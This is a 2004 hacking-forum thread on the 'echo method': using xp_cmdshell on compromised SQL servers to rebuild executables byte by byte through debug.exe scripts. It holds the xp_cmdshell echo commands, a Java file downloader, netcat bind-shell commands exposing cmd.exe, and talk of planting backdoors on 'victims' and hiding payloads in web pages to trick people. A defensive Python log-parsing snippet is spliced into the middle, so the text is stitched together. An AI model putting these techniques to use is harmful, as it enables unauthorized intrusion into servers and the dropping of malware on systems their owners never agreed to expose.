2Fa$t
QUOTE (The Storm @ Apr 20 2004, 01:48 PM)
on SQLEXEC2 (posted in DL section) u can put a few commands in one by binding them with a &, but there is no space, e.g.:

echo line 1 >> test.txt&echo line 2 >> test.txt&echo line 3 >> test.txt&...

I think there should be no space. And I don't know if SQLEXEC2 can handle so many echo commands! If someone put a & after each line, pls post the txt here!

It will work for SQL! There you don't have to paste it line by line!
I think a cmd (shell) would get stuck by pasting such huge text, but I think with SQLEXEC2 it works just great!
rh+
couldn't find sqlexec2 in downloads
also searched through the net, no results. Can anyone share it with us?

regards
B1G
QUOTE (The Storm @ Apr 22 2004, 08:55 AM)
@B1G what way did u use to make the bat on the remote SQL?

I use Query Analyzer

you can run many lines of code like this

QUOTE

EXEC [master].[dbo].[xp_cmdshell] "ECHO @ECHO OFF^>1>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F^>^>1>>c:\winnt\system32\ftp.bat"
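One thing an incident responder would want from captured xp_cmdshell commands like the ones in this post is the binary they were assembling. The example below (added here, not code from this thread) parses constructed SQL audit log lines, pulls out the debug.exe `e` rows that are being echoed into the script file, lays them out at their offsets and checks whether the result starts with an MZ header; the log line format and the `sa` login are assumptions, the hex rows are the ones posted above.

```python
import re

# Constructed sample: SQL audit log lines showing the xp_cmdshell "echo method"
# from this thread (the hex rows are the ones B1G posted above; timestamps and
# the "sa" login are made up for the example).
SAMPLE_LOG = """\
2004-04-22 08:55:01 sa EXEC [master].[dbo].[xp_cmdshell] "ECHO @ECHO OFF^>1>c:\\winnt\\system32\\ftp.bat"
2004-04-22 08:55:02 sa EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>c:\\winnt\\system32\\ftp.bat"
2004-04-22 08:55:03 sa EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>c:\\winnt\\system32\\ftp.bat"
2004-04-22 08:55:09 sa SELECT name FROM sysobjects
"""

# The command string passed to xp_cmdshell, with its surrounding quotes stripped.
XP_CMDSHELL = re.compile(r'xp_cmdshell\]?\s+"?(?P<cmd>.*?)"?\s*$', re.IGNORECASE)
# A debug.exe "e <offset> <byte> <byte> ..." row being echoed into a script file.
DEBUG_E = re.compile(r"\becho\s+e\s+([0-9A-Fa-f]{4})((?:\s+[0-9A-Fa-f]{2})+)", re.IGNORECASE)

def extract_debug_rows(log_text):
    """Return (offset, bytes) for every xp_cmdshell line that echoes a debug 'e' row."""
    rows = []
    for line in log_text.splitlines():
        m = XP_CMDSHELL.search(line)
        if not m:
            continue
        d = DEBUG_E.search(m.group("cmd"))
        if d:
            rows.append((int(d.group(1), 16), bytes.fromhex(d.group(2))))
    return rows

def reconstruct(rows):
    """Lay the rows out at their offsets, relative to the lowest one (debug scripts start at 0100)."""
    if not rows:
        return b""
    base = min(off for off, _ in rows)
    buf = bytearray(max(off + len(data) for off, data in rows) - base)
    for off, data in rows:
        buf[off - base:off - base + len(data)] = data
    return bytes(buf)

def looks_like_dropped_pe(log_text):
    """True when the echoed rows assemble into something starting with the MZ header."""
    return reconstruct(extract_debug_rows(log_text))[:2] == b"MZ"
```

Rows that arrive out of order or with gaps are handled by placing each at its own offset, so a partial capture still yields the bytes that were seen.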
ShadowRun
already posted on codelinx but someone might find it useful

all you need is j2sdk installed

this is just a method you can use in any program, or echo a class to file,
compile and run

CODE
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class Down {
  // Fetches "from" over HTTP with a GET and writes the response body to the
  // local path "to". Returns null on success, or the exception message on failure.
  public static String down(String from, String to){
      try{
          HttpURLConnection connection = (HttpURLConnection) new URL(from).openConnection();
          connection.setRequestMethod("GET");
          connection.connect();
          InputStream is = connection.getInputStream();
          FileOutputStream os = new FileOutputStream(new File(to));
          int i = 0;
          // copy the body one byte at a time until end of stream
          while ((i = is.read()) != -1)
              os.write(i);
          is.close();
          os.close();
          connection.disconnect();
      }
      catch(Exception e){
          return e.getMessage();
      }
      return null;
  }
}


usage:
down("http://www.somesite.com/ftp.exe","c:\\ftp.exe");

don't forget the http://
and
\\ or / instead of \


greetz
el33t
something like uuencode/uudecode in *nix, but use debug here;)
brainbuster
that's what is called a real good thread :-D
this rox^^
strohunter
perhaps you should upx ftp.exe before creating your batch file ^^;
brainbuster
hi

I did that for a few command line tools:
cmdtools.zip

and coded a GUI so you can script every .exe that way:
exe-script GUI

hf
brainbuster
spyfire
very nice man, it is a really good method to copy files!
LittleHacker
It doesn't work on Win ME !
mrfastass
didn't understand it, and how I make those files, and a little background on how it works..? tnx
LittleHacker
I think the problem is with double > character.
Windows ME has a 16 bit shell and does not support all commands of the NT series!
ghoststone
QUOTE (brainbuster @ May 6 2004, 09:44 PM)
hi

I did that for a few command line tools:
cmdtools.zip

and coded a GUI so you can script every .exe that way:
exe-script GUI

hf 
brainbuster

I think this is

cmdtools.zip
Yosam
Help guys,

I tried doing it with wget.exe (not the one posted here, the one which weighs 159KB).

It didn't work for me; I used the software someone posted here (cmdtools etc).

It just creates an empty wget.exe file.

Please help me.
101
I add here ftp.txt from a Win2k SP4 English; what is better with it?

- smaller, -450 lines to debug
- works now without problems on WinXP & Win2K & Win9x (tested)

A small tip now if you wanna use SecureCRT in listening mode to be able then to copy paste the huge .txt without problems:

-*example*-

your local IP = 192.168.0.2
run a listening netcat1: nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT, do a simple telnet connection on 192.168.0.2:12345 (you'll have a shell of course on your own computer through SecureCRT)
Open now another listening netcat2 through this local sCRT shell; you'll finally be able to copy paste this huge txt if a victim spawns a shell to this netcat2 ;p

bye.
tonikgin
QUOTE (LittleHacker @ May 8 2004, 07:28 PM)
It doesn't work on Win ME !

Gee, I wonder why. Maybe if you didn't use the shittiest OS version ever made.

Try 2000, (filtered) XP unless you're a massive gamer
Lanig
hmm just thinking... u can transfer any file without having ftp/tftp/vbs/rcp access
u can just use the ftp.bat (the bat it creates when first executing) and run on ur computer
nc.exe -L -p [PORT] < ftp.bat
and then on the remote shell:
telnet -f ftp.bat [YOURIP] [PORT]
that will create the ftp.bat and all u need to do is execute it, and of course u can instead upload backdoors or scanners or a "ur system is vulnerable" txt (I'm sure that will be the most popular)
bad thing is that ur shell might die cuz telnet does that sometimes
and the reason u can't use it to transfer any file is because telnet has a 70 char limit in every line; if u transfer more, the data will be moved to the next line and the exe will be corrupted
147111
The only trouble with cmdget.exe, if I remember right, is that it executes the file once it has been downloaded, so if u don't want the file to run you have to remove the extension when u specify where u want to save it, e.g. c:\test not c:\test.exe. But it would be a lot smaller than ftp.exe, so maybe it's quicker.
radien
Really Nasty method

Thx buddy
ANORIUS
Is there some way to do this in exe-to-html... it would be a lot easier to trick someone with an http file which contained some pictures, a little text and a hidden ftp-server hex-code

I would love to make one myself but I'm no http programmer (sorry)...
(some feedback plz)
DMX2
Wowieee...

This is some nice work of you..


Tested it and its working fine...Nice work...

Greetzzz
toska
very well done guys!
PulpFiction
well ... tested it on my machine ... worked fine ;D
thanks a lot ;D
Mrwh!P
great methods in these threads, I'll test them all :)

thx for it

so long Mrwh!P
kok
it's very good tools you've shared

more thx
macca
all I can say is that this is very sexy.. big thx 10/10
Uli
heh awesome thx
o0oKARo0o
That's very nice, but how do you get the binary codes for .exe?
How could I get the code for small applications so I don't have to upload them but just create them straight away on the victim's HD?
B1G
I tried with nc.exe but it doesn't work, the resulting exe gives an error

Can someone post the bat for nc.exe?

Please..
101
In the attachment is the tool I used to do it.
You have to do some modification to the .bat created to make it smaller than in a txt.
Take my ftp.txt for an example.

Also a tip: Windows XP & maybe others can't debug something to make it .exe,
that's why in my ftp.txt, Windows debugs it to ftp.sys, then it renames it to ftp.exe.

also big thx to SAD1c who built this handy proggie.
B1G
thank you very much! it works!

Now how can I make the bat smaller than the txt?
strasharo
Thank you very much 101.
CarTmanKILL
yeah!!!!!!!!! a very nice method, I have to test it hé hé
KieMaN
nice work
illwill
I fixed cmdget so it gives you the option to execute when downloaded .. get it at http://illmob.org
o0oKARo0o
Great news, thanks for that, your website is so interesting, full of tools and apps that make life easier for every haxxor..
Great work, carry on
DumpZ
True, and in 10 years every person who can get hold of hacking tools is immediately a hacker without maybe even knowing what an OS is
101
2 new tips added, 1 to use SecureCRT in listening mode, and another one, when
you are on an admin/system shell with the impossibility to copy paste the huge .txt

bye.
jamezz98
Great thread. Gonna give this a go... I never knew Windows could build exe files in this way. Great tools and tutorial 101
dijk
incredibly - it works very very well for me. thx a lot bro!
Kralle
thx! for this nice tools!
Peter4020
QUOTE (easternerd @ Mar 14 2004, 07:33 PM)
Innovation is the KeyWord
I really congratulate 101 for
showing a very simple yet
impressive method where we
can take advantage of just
the Swiss Army Knife alone.

lol
illwill
hey peter how have you been .. haven't seen your messenger online much
R0x0r
This is just great m8.. U really r0x that shit.. Thnx a lot for the great method
Icingtaupe
Eek, I'm late, again ...

I want to give a huge thanks to 101 for this method, and to all who have given an effort into that method, like the "better" ftp.txt and all proggies :-)

Thanks a lot guys, really, it is very very interesting ...
net_runner
what could I be doing wrong when I try to mix SecureCRT & psexec?

I'm running nc on MY machine
I have the password of the VM (virtual machine) (192.168.1.101)

I connected through SecureCRT to MY machine
and then

inside SecureCRT I execute psexec to connect to the VM

QUOTE
D:\>psexec \\192.168.1.101 -u Administrator -p test cmd
psexec \\192.168.1.101 -u Administrator -p test cmd

PsExec v1.43 - execute processes remotely
Copyright © 2001-2003 Mark Russinovich
www.sysinternals.com
cmd exited on 192.168.1.101 with error code 0


so, what should I do to execute commands?
fulvioo
nc in "echo method"
just don't forget to rename nc.sys to nc.exe when it ends
opus
nice method
thanks for sharing it
flashlord
hmmmm
ftp.exe says (used SecureCRT and ftp.txt from page 8):

This program cannot be run in DOS mode.